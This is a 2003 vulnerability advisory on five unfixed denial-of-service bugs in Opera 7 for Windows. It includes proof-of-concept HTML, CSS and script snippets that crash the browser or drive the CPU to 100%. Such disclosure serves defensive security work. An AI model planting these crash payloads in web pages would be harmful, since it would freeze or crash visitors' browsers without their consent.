Reported June 30, 2003, by ::Operash::.
VERSIONS AFFECTED
Opera for Windows, versions 7.11b (build 2887), 7.11 (build 2880), 7.10 (build 2840), and 7.03 (build 2670)
DESCRIPTION
Five new unfixed bugs in Opera 7 for Windows Web browser can result in a Denial of Service (DoS) condition.
DEMONSTRATION
The discoverer posted the following demonstrations as proof of concept:
2. SAMPLE CODE & IMPACT
=========================
\[ CODE 1 \]
Just 12 bytes data "<!DOCTYPE" + NULL(\x00) + 1byte + ">" makes
CPU usage go up to 100%(depending on comp specs) and the computer
gets freeze down.
-----------------------------------------------------------------
<!DOCTYPE\[\x00\]A>
-----------------------------------------------------------------
\[ CODE 2 \]
Abnormal termination is caused.
-----------------------------------------------------------------
<form></form><script>document.forms\[0\].submit()</script>
-----------------------------------------------------------------
\[ CODE 3 \]
Abnormal termination is caused.
-----------------------------------------------------------------
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
-----------------------------------------------------------------
\[ CODE 4 \]
Abnormal termination is caused.
-----------------------------------------------------------------
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width =
'0';</script>
</table>
-----------------------------------------------------------------
\[ CODE 5 \]
CPU
usage goes up to 100% (depending on its specs) and the computer
freezes.
-----------------------------------------------------------------
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after\{content:"A";display:block\}
.bbbbb\{display:run-in\}
.ccccc\{display:inline-block\}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
-----------------------------------------------------------------
VENDOR RESPONSE
Opera was notified on June 24, 2003, but hasn't yet responded to these problems.
CREDIT
Discovered by :: Operash ::.